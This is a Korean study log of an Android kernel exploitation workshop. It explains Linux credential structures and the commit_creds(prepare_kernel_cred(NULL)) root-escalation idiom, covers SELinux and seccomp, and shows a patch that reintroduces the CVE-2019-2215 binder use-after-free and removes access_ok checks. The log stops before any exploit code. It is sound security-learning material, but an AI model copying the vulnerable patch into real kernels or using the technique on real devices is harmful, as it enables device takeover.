Android Kernel Exploitation 실습

환경상문제로 끝까지 실습을 해보지 못함.

page

android studio 설치

32,64비트확인

sdk tools 는 설치 못했음

path설정

configure 부분보면 create desktop entry 있음

root 계정 : su

세팅전만 4일 구운거 i7,16gb인데 emulator만 돌리면 vm자체가 맛이가버림. emulator로 하는것은 포기

Linux Privilege Escalation

목표 : root권한 탈취

1. Light Weight Process

리눅스는 멀티쓰레딩 지원을 원할하게 하기위해서 Light Weight Process을 지원한다. 각 Light Weight Process에는 include/linux/sched.h에 정의되어있는 task_struct 프로세스 관리자를 할당한다.

task_struct structure definition

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
        /*
         * For reasons of header soup (see current_thread_info()), this
         * must be the first element of task_struct.
         */
        struct thread_info              thread_info;
#endif
        /* -1 unrunnable, 0 runnable, >0 stopped: */
        volatile long                   state;

        /*
         * This begins the randomizable portion of task_struct. Only
         * scheduling-critical items should be added above here.
         */
        randomized_struct_fields_start

        void                            *stack;
        atomic_t                        usage;
        /* Per task flags (PF_*), defined further below: */
        unsigned int                    flags;
        unsigned int                    ptrace;

#ifdef CONFIG_SMP
        struct llist_node               wake_entry;
        int                             on_cpu;
#ifdef CONFIG_THREAD_INFO_IN_TASK
        /* Current CPU: */
        unsigned int                    cpu;
#endif
        unsigned int                    wakee_flips;
        unsigned long                   wakee_flip_decay_ts;
        struct task_struct              *last_wakee;

        int                             wake_cpu;
#endif
        int                             on_rq;

        int                             prio;
        int                             static_prio;
        int                             normal_prio;
        unsigned int                    rt_priority;

        const struct sched_class        *sched_class;
        struct sched_entity             se;
        struct sched_rt_entity          rt;
#ifdef CONFIG_SCHED_WALT
        struct ravg ravg;
        /*
         * 'init_load_pct' represents the initial task load assigned to children
         * of this task
         */
        u32 init_load_pct;
        u64 last_sleep_ts;
#endif

#ifdef CONFIG_CGROUP_SCHED
        struct task_group               *sched_task_group;
#endif
        struct sched_dl_entity          dl;

#ifdef CONFIG_PREEMPT_NOTIFIERS
        /* List of struct preempt_notifier: */
        struct hlist_head               preempt_notifiers;
#endif

#ifdef CONFIG_BLK_DEV_IO_TRACE
        unsigned int                    btrace_seq;
#endif

        unsigned int                    policy;
        int                             nr_cpus_allowed;
        cpumask_t                       cpus_allowed;

#ifdef CONFIG_PREEMPT_RCU
        int                             rcu_read_lock_nesting;
        union rcu_special               rcu_read_unlock_special;
        struct list_head                rcu_node_entry;
        struct rcu_node                 *rcu_blocked_node;
#endif /* #ifdef CONFIG_PREEMPT_RCU */

#ifdef CONFIG_TASKS_RCU
        unsigned long                   rcu_tasks_nvcsw;
        u8                              rcu_tasks_holdout;
        u8                              rcu_tasks_idx;
        int                             rcu_tasks_idle_cpu;
        struct list_head                rcu_tasks_holdout_list;
#endif /* #ifdef CONFIG_TASKS_RCU */

        struct sched_info               sched_info;

        struct list_head                tasks;
#ifdef CONFIG_SMP
        struct plist_node               pushable_tasks;
        struct rb_node                  pushable_dl_tasks;
#endif

        struct mm_struct                *mm;
        struct mm_struct                *active_mm;

        /* Per-thread vma caching: */
        struct vmacache                 vmacache;

#ifdef SPLIT_RSS_COUNTING
        struct task_rss_stat            rss_stat;
#endif
        int                             exit_state;
        int                             exit_code;
        int                             exit_signal;
        /* The signal sent when the parent dies: */
        int                             pdeath_signal;
        /* JOBCTL_*, siglock protected: */
        unsigned long                   jobctl;

        /* Used for emulating ABI behavior of previous Linux versions: */
        unsigned int                    personality;

        /* Scheduler bits, serialized by scheduler locks: */
        unsigned                        sched_reset_on_fork:1;
        unsigned                        sched_contributes_to_load:1;
        unsigned                        sched_migrated:1;
        unsigned                        sched_remote_wakeup:1;
#ifdef CONFIG_PSI
        unsigned                        sched_psi_wake_requeue:1;
#endif

        /* Force alignment to the next boundary: */
        unsigned                        :0;

        /* Unserialized, strictly 'current' */

        /* Bit to tell LSMs we're in execve(): */
        unsigned                        in_execve:1;
        unsigned                        in_iowait:1;
#ifndef TIF_RESTORE_SIGMASK
        unsigned                        restore_sigmask:1;
#endif
#ifdef CONFIG_MEMCG
        unsigned                        memcg_may_oom:1;
#ifndef CONFIG_SLOB
        unsigned                        memcg_kmem_skip_account:1;
#endif
#endif
#ifdef CONFIG_COMPAT_BRK
        unsigned                        brk_randomized:1;
#endif
#ifdef CONFIG_CGROUPS
        /* disallow userland-initiated cgroup migration */
        unsigned                        no_cgroup_migration:1;
#endif

        unsigned long                   atomic_flags; /* Flags requiring atomic access. */

        struct restart_block            restart_block;

        pid_t                           pid;
        pid_t                           tgid;

#ifdef CONFIG_CC_STACKPROTECTOR
        /* Canary value for the -fstack-protector GCC feature: */
        unsigned long                   stack_canary;
#endif
        /*
         * Pointers to the (original) parent process, youngest child, younger sibling,
         * older sibling, respectively.  (p->father can be replaced with
         * p->real_parent->pid)
         */

        /* Real parent process: */
        struct task_struct __rcu        *real_parent;

        /* Recipient of SIGCHLD, wait4() reports: */
        struct task_struct __rcu        *parent;

        /*
         * Children/sibling form the list of natural children:
         */
        struct list_head                children;
        struct list_head                sibling;
        struct task_struct              *group_leader;

        /*
         * 'ptraced' is the list of tasks this task is using ptrace() on.
         *
         * This includes both natural children and PTRACE_ATTACH targets.
         * 'ptrace_entry' is this task's link on the p->parent->ptraced list.
         */
        struct list_head                ptraced;
        struct list_head                ptrace_entry;

        /* PID/PID hash table linkage. */
        struct pid_link                 pids[PIDTYPE_MAX];
        struct list_head                thread_group;
        struct list_head                thread_node;

        struct completion               *vfork_done;

        /* CLONE_CHILD_SETTID: */
        int __user                      *set_child_tid;

        /* CLONE_CHILD_CLEARTID: */
        int __user                      *clear_child_tid;

        u64                             utime;
        u64                             stime;
#ifdef CONFIG_ARCH_HAS_SCALED_CPUTIME
        u64                             utimescaled;
        u64                             stimescaled;
#endif
        u64                             gtime;
#ifdef CONFIG_CPU_FREQ_TIMES
        u64                             *time_in_state;
        unsigned int                    max_state;
#endif
        struct prev_cputime             prev_cputime;
#ifdef CONFIG_VIRT_CPU_ACCOUNTING_GEN
        struct vtime                    vtime;
#endif

#ifdef CONFIG_NO_HZ_FULL
        atomic_t                        tick_dep_mask;
#endif
        /* Context switch counts: */
        unsigned long                   nvcsw;
        unsigned long                   nivcsw;

        /* Monotonic time in nsecs: */
        u64                             start_time;

        /* Boot based time in nsecs: */
        u64                             real_start_time;

        /* MM fault and swap info: this can arguably be seen as either mm-specific or thread-specific: */
        unsigned long                   min_flt;
        unsigned long                   maj_flt;

#ifdef CONFIG_POSIX_TIMERS
        struct task_cputime             cputime_expires;
        struct list_head                cpu_timers[3];
#endif

        /* Process credentials: */

        /* Tracer's credentials at attach: */
        const struct cred __rcu         *ptracer_cred;

        /* Objective and real subjective task credentials (COW): */
        const struct cred __rcu         *real_cred;

        /* Effective (overridable) subjective task credentials (COW): */
        const struct cred __rcu         *cred;

        /*
         * executable name, excluding path.
         *
         * - normally initialized setup_new_exec()
         * - access it with [gs]et_task_comm()
         * - lock it with task_lock()
         */
        char                            comm[TASK_COMM_LEN];

        struct nameidata                *nameidata;

#ifdef CONFIG_SYSVIPC
        struct sysv_sem                 sysvsem;
        struct sysv_shm                 sysvshm;
#endif
#ifdef CONFIG_DETECT_HUNG_TASK
        unsigned long                   last_switch_count;
#endif
        /* Filesystem information: */
        struct fs_struct                *fs;

        /* Open file information: */
        struct files_struct             *files;

        /* Namespaces: */
        struct nsproxy                  *nsproxy;

        /* Signal handlers: */
        struct signal_struct            *signal;
        struct sighand_struct           *sighand;
        sigset_t                        blocked;
        sigset_t                        real_blocked;
        /* Restored if set_restore_sigmask() was used: */
        sigset_t                        saved_sigmask;
        struct sigpending               pending;
        unsigned long                   sas_ss_sp;
        size_t                          sas_ss_size;
        unsigned int                    sas_ss_flags;

        struct callback_head            *task_works;

        struct audit_context            *audit_context;
#ifdef CONFIG_AUDITSYSCALL
        kuid_t                          loginuid;
        unsigned int                    sessionid;
#endif
        struct seccomp                  seccomp;

        /* Thread group tracking: */
        u32                             parent_exec_id;
        u32                             self_exec_id;

        /* Protection against (de-)allocation: mm, files, fs, tty, keyrings, mems_allowed, mempolicy: */
        spinlock_t                      alloc_lock;

        /* Protection of the PI data structures: */
        raw_spinlock_t                  pi_lock;

        struct wake_q_node              wake_q;

#ifdef CONFIG_RT_MUTEXES
        /* PI waiters blocked on a rt_mutex held by this task: */
        struct rb_root_cached           pi_waiters;
        /* Updated under owner's pi_lock and rq lock */
        struct task_struct              *pi_top_task;
        /* Deadlock detection and priority inheritance handling: */
        struct rt_mutex_waiter          *pi_blocked_on;
#endif

#ifdef CONFIG_DEBUG_MUTEXES
        /* Mutex deadlock detection: */
        struct mutex_waiter             *blocked_on;
#endif

#ifdef CONFIG_TRACE_IRQFLAGS
        unsigned int                    irq_events;
        unsigned long                   hardirq_enable_ip;
        unsigned long                   hardirq_disable_ip;
        unsigned int                    hardirq_enable_event;
        unsigned int                    hardirq_disable_event;
        int                             hardirqs_enabled;
        int                             hardirq_context;
        unsigned long                   softirq_disable_ip;
        unsigned long                   softirq_enable_ip;
        unsigned int                    softirq_disable_event;
        unsigned int                    softirq_enable_event;
        int                             softirqs_enabled;
        int                             softirq_context;
#endif

#ifdef CONFIG_LOCKDEP
# define MAX_LOCK_DEPTH                 48UL
        u64                             curr_chain_key;
        int                             lockdep_depth;
        unsigned int                    lockdep_recursion;
        struct held_lock                held_locks[MAX_LOCK_DEPTH];
#endif

#ifdef CONFIG_LOCKDEP_CROSSRELEASE
#define MAX_XHLOCKS_NR 64UL
        struct hist_lock *xhlocks; /* Crossrelease history locks */
        unsigned int xhlock_idx;
        /* For restoring at history boundaries */
        unsigned int xhlock_idx_hist[XHLOCK_CTX_NR];
        unsigned int hist_id;
        /* For overwrite check at each context exit */
        unsigned int hist_id_save[XHLOCK_CTX_NR];
#endif

#ifdef CONFIG_UBSAN
        unsigned int                    in_ubsan;
#endif

        /* Journalling filesystem info: */
        void                            *journal_info;

        /* Stacked block device info: */
        struct bio_list                 *bio_list;

#ifdef CONFIG_BLOCK
        /* Stack plugging: */
        struct blk_plug                 *plug;
#endif

        /* VM state: */
        struct reclaim_state            *reclaim_state;

        struct backing_dev_info         *backing_dev_info;

        struct io_context               *io_context;

        /* Ptrace state: */
        unsigned long                   ptrace_message;
        siginfo_t                       *last_siginfo;

        struct task_io_accounting       ioac;
#ifdef CONFIG_PSI
        /* Pressure stall state */
        unsigned int                    psi_flags;
#endif
#ifdef CONFIG_TASK_XACCT
        /* Accumulated RSS usage: */
        u64                             acct_rss_mem1;
        /* Accumulated virtual memory usage: */
        u64                             acct_vm_mem1;
        /* stime + utime since last update: */
        u64                             acct_timexpd;
#endif
#ifdef CONFIG_CPUSETS
        /* Protected by ->alloc_lock: */
        nodemask_t                      mems_allowed;
        /* Seqence number to catch updates: */
        seqcount_t                      mems_allowed_seq;
        int                             cpuset_mem_spread_rotor;
        int                             cpuset_slab_spread_rotor;
#endif
#ifdef CONFIG_CGROUPS
        /* Control Group info protected by css_set_lock: */
        struct css_set __rcu            *cgroups;
        /* cg_list protected by css_set_lock and tsk->alloc_lock: */
        struct list_head                cg_list;
#endif
#ifdef CONFIG_INTEL_RDT
        u32                             closid;
        u32                             rmid;
#endif
#ifdef CONFIG_FUTEX
        struct robust_list_head __user  *robust_list;
#ifdef CONFIG_COMPAT
        struct compat_robust_list_head __user *compat_robust_list;
#endif
        struct list_head                pi_state_list;
        struct futex_pi_state           *pi_state_cache;
#endif
#ifdef CONFIG_PERF_EVENTS
        struct perf_event_context       *perf_event_ctxp[perf_nr_task_contexts];
        struct mutex                    perf_event_mutex;
        struct list_head                perf_event_list;
#endif
#ifdef CONFIG_DEBUG_PREEMPT
        unsigned long                   preempt_disable_ip;
#endif
#ifdef CONFIG_NUMA
        /* Protected by alloc_lock: */
        struct mempolicy                *mempolicy;
        short                           il_prev;
        short                           pref_node_fork;
#endif
#ifdef CONFIG_NUMA_BALANCING
        int                             numa_scan_seq;
        unsigned int                    numa_scan_period;
        unsigned int                    numa_scan_period_max;
        int                             numa_preferred_nid;
        unsigned long                   numa_migrate_retry;
        /* Migration stamp: */
        u64                             node_stamp;
        u64                             last_task_numa_placement;
        u64                             last_sum_exec_runtime;
        struct callback_head            numa_work;

        struct list_head                numa_entry;
        struct numa_group               *numa_group;

        /*
         * numa_faults is an array split into four regions:
         * faults_memory, faults_cpu, faults_memory_buffer, faults_cpu_buffer
         * in this precise order.
         *
         * faults_memory: Exponential decaying average of faults on a per-node
         * basis. Scheduling placement decisions are made based on these
         * counts. The values remain static for the duration of a PTE scan.
         * faults_cpu: Track the nodes the process was running on when a NUMA
         * hinting fault was incurred.
         * faults_memory_buffer and faults_cpu_buffer: Record faults per node
         * during the current scan window. When the scan completes, the counts
         * in faults_memory and faults_cpu decay and these values are copied.
         */
        unsigned long                   *numa_faults;
        unsigned long                   total_numa_faults;

        /*
         * numa_faults_locality tracks if faults recorded during the last
         * scan window were remote/local or failed to migrate. The task scan
         * period is adapted based on the locality of the faults with different
         * weights depending on whether they were shared or private faults
         */
        unsigned long                   numa_faults_locality[3];

        unsigned long                   numa_pages_migrated;
#endif /* CONFIG_NUMA_BALANCING */

        struct tlbflush_unmap_batch     tlb_ubc;

        struct rcu_head                 rcu;

        /* Cache last used pipe for splice(): */
        struct pipe_inode_info          *splice_pipe;

        struct page_frag                task_frag;

#ifdef CONFIG_TASK_DELAY_ACCT
        struct task_delay_info          *delays;
#endif

#ifdef CONFIG_FAULT_INJECTION
        int                             make_it_fail;
        unsigned int                    fail_nth;
#endif
        /*
         * When (nr_dirtied >= nr_dirtied_pause), it's time to call
         * balance_dirty_pages() for a dirty throttling pause:
         */
        int                             nr_dirtied;
        int                             nr_dirtied_pause;
        /* Start of a write-and-pause period: */
        unsigned long                   dirty_paused_when;

#ifdef CONFIG_LATENCYTOP
        int                             latency_record_count;
        struct latency_record           latency_record[LT_SAVECOUNT];
#endif
        /*
         * Time slack values; these are used to round up poll() and
         * select() etc timeout values. These are in nanoseconds.
         */
        u64                             timer_slack_ns;
        u64                             default_timer_slack_ns;

#ifdef CONFIG_KASAN
        unsigned int                    kasan_depth;
#endif

#ifdef CONFIG_FUNCTION_GRAPH_TRACER
        /* Index of current stored address in ret_stack: */
        int                             curr_ret_stack;

        /* Stack of return addresses for return function tracing: */
        struct ftrace_ret_stack         *ret_stack;

        /* Timestamp for last schedule: */
        unsigned long long              ftrace_timestamp;

        /*
         * Number of functions that haven't been traced
         * because of depth overrun:
         */
        atomic_t                        trace_overrun;

        /* Pause tracing: */
        atomic_t                        tracing_graph_pause;
#endif

#ifdef CONFIG_TRACING
        /* State flags for use by tracers: */
        unsigned long                   trace;

        /* Bitmask and counter of trace recursion: */
        unsigned long                   trace_recursion;
#endif /* CONFIG_TRACING */

#ifdef CONFIG_KCOV
        /* Coverage collection mode enabled for this task (0 if disabled): */
        enum kcov_mode                  kcov_mode;

        /* Size of the kcov_area: */
        unsigned int                    kcov_size;

        /* Buffer for coverage collection: */
        void                            *kcov_area;

        /* KCOV descriptor wired with this task or NULL: */
        struct kcov                     *kcov;
#endif

#ifdef CONFIG_MEMCG
        struct mem_cgroup               *memcg_in_oom;
        gfp_t                           memcg_oom_gfp_mask;
        int                             memcg_oom_order;

        /* Number of pages to reclaim on returning to userland: */
        unsigned int                    memcg_nr_pages_over_high;
#endif

#ifdef CONFIG_UPROBES
        struct uprobe_task              *utask;
#endif
#if defined(CONFIG_BCACHE) || defined(CONFIG_BCACHE_MODULE)
        unsigned int                    sequential_io;
        unsigned int                    sequential_io_avg;
#endif
#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
        unsigned long                   task_state_change;
#endif
        int                             pagefault_disabled;
#ifdef CONFIG_MMU
        struct task_struct              *oom_reaper_list;
#endif
#ifdef CONFIG_VMAP_STACK
        struct vm_struct                *stack_vm_area;
#endif
#ifdef CONFIG_THREAD_INFO_IN_TASK
        /* A live task holds one reference: */
        atomic_t                        stack_refcount;
#endif
#ifdef CONFIG_LIVEPATCH
        int patch_state;
#endif
#ifdef CONFIG_SECURITY
        /* Used by LSM modules for access restriction: */
        void                            *security;
#endif

        /*
         * New fields for task_struct should be added above here, so that
         * they are included in the randomized portion of task_struct.
         */
        randomized_struct_fields_end

        /* CPU-specific state of this task: */
        struct thread_struct            thread;

        /*
         * WARNING: on x86, 'thread_struct' contains a variable-sized
         * structure.  It *MUST* be at the end of 'task_struct'.
         *
         * Do not put anything below here!
         */
};


task_struct 구조체는 cred라는 멤버를 가지고있다.

2. Process Credentials

cred struct (include/linux/cred.h.)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
struct cred {
        atomic_t        usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
        atomic_t        subscribers;    /* number of processes subscribed */
        void            *put_addr;
        unsigned        magic;
#define CRED_MAGIC      0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
        kuid_t          uid;            /* real UID of the task */
        kgid_t          gid;            /* real GID of the task */
        kuid_t          suid;           /* saved UID of the task */
        kgid_t          sgid;           /* saved GID of the task */
        kuid_t          euid;           /* effective UID of the task */
        kgid_t          egid;           /* effective GID of the task */
        kuid_t          fsuid;          /* UID for VFS ops */
        kgid_t          fsgid;          /* GID for VFS ops */
        unsigned        securebits;     /* SUID-less security management */
        kernel_cap_t    cap_inheritable; /* caps our children can inherit */
        kernel_cap_t    cap_permitted;  /* caps we're permitted */
        kernel_cap_t    cap_effective;  /* caps we can actually use */
        kernel_cap_t    cap_bset;       /* capability bounding set */
        kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
        unsigned char   jit_keyring;    /* default keyring to attach requested
                                         * keys to */
        struct key __rcu *session_keyring; /* keyring inherited over fork */
        struct key      *process_keyring; /* keyring private to this process */
        struct key      *thread_keyring; /* keyring private to this thread */
        struct key      *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
        void            *security;      /* subjective LSM security */
#endif
        struct user_struct *user;       /* real user ID subscription */
        struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
        struct group_info *group_info;  /* supplementary groups for euid/fsgid */
        /* RCU deletion */
        union {
                int non_rcu;                    /* Can we skip RCU deletion? */
                struct rcu_head rcu;            /* RCU deletion hook */
        };
} __randomize_layout;

커널 익스 플로잇의 가장 많은 부분 중 루트 권한을 흭득하기 위해서 다음을 사용한다.

1
commit_creds(prepare_kernel_cred(NULL));

prepare_kernel_cred function(kernel/cred.c)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
        const struct cred *old;
        struct cred *new;

        new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
        if (!new)
                return NULL;

        kdebug("prepare_kernel_cred() alloc %p", new);

        if (daemon)
                old = get_task_cred(daemon);
        else
                old = get_cred(&init_cred);

        validate_creds(old);

        *new = *old;
        [...]
        validate_creds(new);
        return new;

error:
        [...]
        return NULL;
}

daemon에 NULL을 인자로 전달할시에 init_cred를 얻는다. init_cred는 task_struct를 첫번째 task로서 초기화 해준다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
/*
 * The initial credentials for the initial task
 */
struct cred init_cred = {
        .usage                  = ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
        .subscribers            = ATOMIC_INIT(2),
        .magic                  = CRED_MAGIC,
#endif
        .uid                    = GLOBAL_ROOT_UID,
        .gid                    = GLOBAL_ROOT_GID,
        .suid                   = GLOBAL_ROOT_UID,
        .sgid                   = GLOBAL_ROOT_GID,
        .euid                   = GLOBAL_ROOT_UID,
        .egid                   = GLOBAL_ROOT_GID,
        .fsuid                  = GLOBAL_ROOT_UID,
        .fsgid                  = GLOBAL_ROOT_GID,
        .securebits             = SECUREBITS_DEFAULT,
        .cap_inheritable        = CAP_EMPTY_SET,
        .cap_permitted          = CAP_FULL_SET,
        .cap_effective          = CAP_FULL_SET,
        .cap_bset               = CAP_FULL_SET,
        .user                   = INIT_USER,
        .user_ns                = &init_user_ns,
        .group_info             = &init_groups,
};

#define GLOBAL_ROOT_UID     (uint32_t)0
#define GLOBAL_ROOT_GID     (uint32_t)0
#define SECUREBITS_DEFAULT  (uint32_t)0x00000000
#define CAP_EMPTY_SET       (uint64_t)0
#define CAP_FULL_SET        (uint64_t)0x3FFFFFFFFF


cred->uid = 0;
cred->gid = 0;
cred->suid = 0;
cred->idid = 0;
cred->euid = 0;
cred->egid = 0;
cred->fsuid = 0;
cred->fsgid = 0;
cred->securebits = 0;
cred->cap_inheritable.cap[0] = 0;
cred->cap_inheritable.cap[1] = 0;
cred->cap_permitted.cap[0] = 0x3F;
cred->cap_permitted.cap[1] = 0xFFFFFFFF;
cred->cap_effective.cap[0] = 0x3F;
cred->cap_effective.cap[1] = 0xFFFFFFFF;
cred->cap_bset.cap[0] = 0x3F;
cred->cap_bset.cap[1] = 0xFFFFFFFF;
cred->cap_ambient.cap[0] = 0;
cred->cap_ambient.cap[1] = 0;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int commit_creds(struct cred *new)
{
        struct task_struct *task = current;
        const struct cred *old = task->real_cred;

        [...]

        rcu_assign_pointer(task->real_cred, new);
        rcu_assign_pointer(task->cred, new);

        [...]

        return 0;
}

3. SELinux

Security-Enhanced Linux was developed by National Security Agency (NSA) using Linux Security Modules (LSM).

There are two modes of SELinux

  • permissive - permission denials are logged but not enforced
  • enforcing - permission denials are logged and enforced

In Android the default mode of SELinux is enforcing and even if we get root, we are subjected to SELinux rules.

1
2
generic_x86_64:/ $ getenforce                                         
Enforcing

So, we need to disable SELinux as well.

4. SecComp

SecComp stands for Secure Computing mode and is a Linux kernel feature that allows to filter system calls. When enabled, the process can only make four system calls read(), write(), exit(), and sigreturn().

When running the exploit from adb shell we are not subjected to seccomp. However, if we bundle the exploit in an Android application, we would be subjected to seccomp.

In this workshop, we are not going to look at seccomp.

Vulnerability Discovery

Use after Free 취약점을가진 CVE-2019-2215을 살펴보자

바인더 하위 시스템이 크롬 샌드박스로부터 도달 할 수 있고 렌더러 익스플로잇과 함께 권한 상승으로 이끌 수 있어 매우 심각한 취약점이다.

  • 2017년 11월에 syzbot이 발견했다
  • 2018년 2월 CVE 번호없이 패치되었다
  • Project Zero의 Maddie Stone (@maddiestone) 이 다시 발견 2019년 9월 27 일에 보고
  • 다음 커밋 id로 패치 q-goldfish-android-goldfish-4.14-dev7a3cee43e935b9d526ad07f20bf005ba7e74d05b
1
2
3
4
5
6
7
8
9
10
11
+       /*
+        * If this thread used poll, make sure we remove the waitqueue
+        * from any epoll data structures holding it with POLLFREE.
+        * waitqueue_active() is safe to use here because we're holding
+        * the inner lock.
+        */
+       if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&
+           waitqueue_active(&thread->wait)) {
+               wake_up_poll(&thread->wait, POLLHUP | POLLFREE);
+       }

Vulnerability Trigger

커스텀 패치로 버그가 있던 시점으로부터 KASan을 달고 재빌드한다.

Reintroduction

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
diff --git a/drivers/android/binder.c b/drivers/android/binder.c
index f6ddec245187..55e2748a13e4 100644
--- a/drivers/android/binder.c
+++ b/drivers/android/binder.c
@@ -4768,10 +4768,12 @@ static int binder_thread_release(struct binder_proc *proc,
      * waitqueue_active() is safe to use here because we're holding
      * the inner lock.
      */
+    /*
     if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&
         waitqueue_active(&thread->wait)) {
         wake_up_poll(&thread->wait, POLLHUP | POLLFREE);
     }
+    */

     binder_inner_proc_unlock(thread->proc);

@@ -4781,8 +4783,10 @@ static int binder_thread_release(struct binder_proc *proc,
      * descriptor being closed); ep_remove_waitqueue() holds an RCU read
      * lock, so we can be sure it's done after calling synchronize_rcu().
      */
+    /*
     if (thread->looper & BINDER_LOOPER_STATE_POLL)
         synchronize_rcu();
+    */

     if (send_reply)
         binder_send_failed_reply(send_reply, BR_DEAD_REPLY);
diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index 7b2fd5f251f2..67af61637f55 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -132,19 +132,21 @@

 static int copyout(void __user *to, const void *from, size_t n)
 {
-    if (access_ok(VERIFY_WRITE, to, n)) {
+    /*if (access_ok(VERIFY_WRITE, to, n)) {
         kasan_check_read(from, n);
         n = raw_copy_to_user(to, from, n);
-    }
+    }*/
+    n = raw_copy_to_user(to, from, n);
     return n;
 }

 static int copyin(void *to, const void __user *from, size_t n)
 {
-    if (access_ok(VERIFY_READ, from, n)) {
+    /*if (access_ok(VERIFY_READ, from, n)) {
         kasan_check_write(to, n);
         n = raw_copy_from_user(to, from, n);
-    }
+    }*/
+    n = raw_copy_from_user(to, from, n);
     return n;
 }

.....................................................

ashfaq@hacksys:~/workshop/android-4.14-dev$ cd goldfish/
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git status
Not currently on any branch.
nothing to commit, working tree clean
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git apply ~/workshop/patch/cve-2019-2215.patch
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git status
Not currently on any branch.
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git checkout -- <file>..." to discard changes in working directory)

    modified:   drivers/android/binder.c
    modified:   lib/iov_iter.c

no changes added to commit (use "git add" and/or "git commit -a")

git apply,diff

  • lib/iov_iter.c가 바뀐이유 Patching drivers/android/binder.c is fine and understandable. But, why we need to patch lib/iov_iter.c?

This is because we are also going to use struct iovec as the corruption target as used by Maddie Stone and Jann Horn of Project Zero. However, they wrote the exploit for Android 4.4 kernel which does not have these additional checks in lib/iov_iter.c.

That’s the reason we revert these new checks with a patch. You will have better idea what I’m talking about as we proceed with the workshop.

무슨소리지 도대체?

Build Kernel With KASan

workshop/build-configs/goldfish.x86_64.kasan 파일에서 build용 kasan을 찾을 수 있다. 이걸 이용해 빌드한다.

1
2
3
4
5
6
7
8
9
10
11
12
13
ashfaq@hacksys:~/workshop/android-4.14-dev$ BUILD_CONFIG=../build-configs/goldfish.x86_64.kasan build/build.sh

ashfaq@hacksys:~/workshop/android-4.14-dev$ nm out/kasan/dist/vmlinux | grep kasan | head 
000000004cfd027e A __crc_kasan_check_read
000000009da7c655 A __crc_kasan_check_write
0000000074961168 A __crc_kasan_kmalloc
0000000047f78877 A __crc_kasan_restore_multi_shot
0000000097645739 A __crc_kasan_save_enable_multi_shot
ffffffff806d4d62 T kasan_add_zero_shadow
ffffffff806d3a9c T kasan_alloc_pages
ffffffff806d3b44 T kasan_cache_create
ffffffff806d55b9 T kasan_cache_shrink
ffffffff806d55c4 T kasan_cache_shutdown

Boot Kernel

1
